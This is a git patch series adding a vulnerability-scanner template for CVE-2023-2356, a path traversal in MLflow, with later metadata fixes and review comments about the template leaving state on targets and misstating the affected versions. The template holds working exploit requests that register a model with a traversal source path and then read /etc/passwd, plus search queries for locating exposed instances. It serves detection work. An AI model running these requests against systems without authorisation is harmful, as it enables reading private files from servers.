From c6e1cabcfe56c8dc0b42524f73dd7bee34979877 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Thu, 4 May 2023 20:59:25 +0800 Subject: [PATCH 1/4] Added CVE-2023-2356 Template --- http/cves/2023/CVE-2023-2356.yaml | 63 +++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2356.yaml diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml new file mode 100644 index 0000000000..a3c3202bfa --- /dev/null +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-2356 + +info: + name: Mlflow 5.2.5 - Local File Inclusion + author: Co5mos + severity: critical + description: | + Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + reference: + - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 + classification: + cvss-metrics: + cvss-score: + cve-id: CVE-2023-2356 + cwe-id: CWE-23 + metadata: + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + verified: "true" + tags: cve,cve2023,lfi,huntr,mlflow + +variables: + str: "{{rand_base(6)}}" + +http: + - raw: + - | + POST /api/2.0/mlflow/registered-models/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}"} + + - | + POST /api/2.0/mlflow/model-versions/create HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} + + - | + GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + internal: true + group: 1 + regex: + - '"version": "([0-9.]+)",' \ No newline at end of file From 4660c9abf3d5d043c579bee2af2a40c6d92bdb58 Mon Sep 17 00:00:00 2001 
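Review bot: The second and third raw requests in the new `http` block leave durable state on the scanned host — a registered model named with the random `{{str}}` value and a model version whose `source` is a `file://` traversal path — yet nothing in `info` tells an operator that this template changes the target. The `tags` line should carry the `intrusive` tag so the template is caught by the usual tag-based exclusions, `tags: cve,cve2023,lfi,huntr,mlflow,intrusive`, and the description should name the residue. The description is currently just the advisory title; a sentence such as `MLflow prior to 2.3.1 does not validate the model-version source path, so the get-artifact endpoint can return arbitrary files from the tracking server; this template registers a throw-away model with a random 6-character name to check for the flaw and does not remove it.` would tell a reader both what is detected and what artefact to expect in the instance afterwards.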
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 5 May 2023 16:48:47 +0530 Subject: [PATCH 2/4] lint -fix --- http/cves/2023/CVE-2023-2356.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index a3c3202bfa..5e529eec9b 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -10,8 +10,8 @@ info: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 classification: - cvss-metrics: - cvss-score: + cvss-metrics: + cvss-score: cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: @@ -31,14 +31,14 @@ http: Content-Type: application/json {"name": "{{str}}"} - + - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - + - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} @@ -60,4 +60,4 @@ http: internal: true group: 1 regex: - - '"version": "([0-9.]+)",' \ No newline at end of file + - '"version": "([0-9.]+)",' From ed206e5c27ad03e8762f23d9549beb65ad8f14c0 Mon Sep 17 00:00:00 2001 From: Co5mos Date: Mon, 8 May 2023 15:12:08 +0800 Subject: [PATCH 3/4] Update CVE-2023-2356 Template --- http/cves/2023/CVE-2023-2356.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 5e529eec9b..b546ed3b5b 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -10,8 +10,8 @@ info: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 classification: - cvss-metrics: - cvss-score: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: 
From 717a7410d94dddef3f6d7c07ad1a39037c2c26b3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 23 May 2023 12:02:34 +0530 Subject: [PATCH 4/4] severity & name -updated --- http/cves/2023/CVE-2023-2356.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index b546ed3b5b..8938fb957c 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -1,9 +1,9 @@ id: CVE-2023-2356 info: - name: Mlflow 5.2.5 - Local File Inclusion + name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos - severity: critical + severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. reference: @@ -15,10 +15,10 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 metadata: + verified: "true" shodan-query: http.title:"mlflow" fofa-query: app="MLflow" - verified: "true" - tags: cve,cve2023,lfi,huntr,mlflow + tags: cve,cve2023,lfi,huntr,mlflow,oss variables: str: "{{rand_base(6)}}" @@ -37,7 +37,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} + {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1
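Review bot: The new `name` line pins the affected range to `<2.3.0`, but the unchanged `description` a few lines below still says the issue affects releases prior to 2.3.1, so the template now contradicts itself about whether 2.3.0 is affected. If the description is the accurate range the title should read `name: Mlflow <2.3.1 - Local File Inclusion`; otherwise the description needs the same correction — the NVD entry listed under `reference` is the place to confirm which one is right.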